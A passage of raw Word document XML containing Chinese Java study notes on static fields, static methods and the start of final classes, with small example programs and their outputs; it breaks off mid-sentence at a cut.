          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2C7208CF" wp14:editId="2DC8A82B">
            <wp:extent cx="5854700" cy="802005"/>
            <wp:effectExtent l="0" t="0" r="12700" b="5715"/>
            <wp:docPr id="2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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5854700" cy="802005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD9FBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修饰符修饰的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也可以成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>静态量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>静态方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而没有此修饰符的域或方法称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实例变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实例方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3345ED41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态域：示例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB970E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>静态域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以理解为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类的一个常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，注意它是属于类的一个常量而不单单属于一个实例，即同一个类的任何一个对象实例去修改它，之后所有实例取到的都是修改后的数值，即此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>变量不保存在某个对象实例的内存区间中，而是保存在类的内存区域的公共存储单元中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCEAFA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D358304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实我们可以用一句话来概括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以当作全局变量来使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F01948" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E069720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class practice {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE09AC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E19AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Person goldsun1 = new Person();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B34AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Person goldsun2 = new Person();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683080E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun1.age = 19;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCFBC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun2.age = 21;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3B211" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun1.trueage = 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23333FE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002708A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun2.age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748323E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.trueage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604B107" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun2.trueage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08419E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(Person.trueage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA2FB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794D60D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E45309" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Person{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195287D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long trueage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E312709" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB32A09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6063BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDEA2D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A353A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78B61B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF00F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67044DA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B231426" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC8B68A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，虽然可以使用实例变量对</w:t>
      </w:r>
      <w:r>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t>成员进行访问，但这并不意味着这个成员就是这个实例的。编译器实际上将</w:t>
      </w:r>
      <w:r>
        <w:t>goldsun1.trueage</w:t>
      </w:r>
      <w:r>
        <w:t>翻译成了</w:t>
      </w:r>
      <w:r>
        <w:t>Person.trueage</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FC9F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>静态方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：类中处理静态变量的公共方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC2D521" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>属于整个类的方法</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是某个实例的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33771DC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBDCCAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>因为所有成员（包括通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实例和类名</w:t>
      </w:r>
      <w:r>
        <w:t>）都可以对静态方法进行访问修改等，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>静态方法中不允许存取实例变量</w:t>
      </w:r>
      <w:r>
        <w:t>。静态方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只允许处理属于整个类的成员</w:t>
      </w:r>
      <w:r>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只能处理静态量</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>调用静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B621F4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E57C2FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在调用类方法时也可以通过实例名或者类名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E01A9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B699D13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class practice {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBC9E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D8141" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Person goldsun1 = new Person();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A946863" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Person goldsun2 = new Person();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A758CA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun1.setParams(20,19);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA107A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun1.setTrueage(100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE9118" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun2.setParams(15,16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0104E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        goldsun2.setTrueage(50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742530A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8A613" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.trueage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19980949" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun2.age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8FBF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun2.trueage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D68F98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F6681" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C23C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Person{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A946221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    static long trueage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49855C9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3EB799" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    static void setTrueage(long i){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1623C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        trueage = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45674FCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        //age = i; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不能在静态方法中访问实例变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D4264" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2598C4C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    void setParams(long i,int j){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1E6F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        trueage = i;//</w:t>
      </w:r>
      <w:r>
        <w:t>实例方法中既可以访问实例变量也可以访问静态变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5DE41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        age = j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC45B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013A8E97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7CF0ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33852C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588BC75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B29551" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031722D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0407D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6BF9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个类可以被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
